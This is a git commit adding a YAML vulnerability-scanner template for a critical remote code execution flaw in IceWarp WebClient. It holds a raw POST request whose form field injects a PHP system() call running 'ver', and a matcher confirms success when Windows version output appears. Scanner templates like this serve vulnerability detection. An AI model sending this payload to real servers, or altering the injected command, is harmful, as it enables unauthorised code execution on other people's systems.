Merge pull request #1909 from gy741/rule-add-v17

Create icewarp-webclient-rce.yaml
patch-1
Prince Chaddha 2021-07-10 09:23:50 +05:30 committed by GitHub
commit ba90f28231
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 28 additions and 0 deletions

View File

@ -0,0 +1,28 @@
id: icewarp-webclient-rce
info:
name: IceWarp WebClient RCE
author: gy741
severity: critical
tags: icewarp,rce
reference: https://www.pwnwiki.org/index.php?title=IceWarp_WebClient_basic_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
requests:
- raw:
- |
POST /webmail/basic/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_dlg[captcha][target]=system(\'ver\')\
matchers-condition: and
matchers:
- type: word
words:
- "Microsoft Windows [Version"
part: body
- type: status
status:
- 302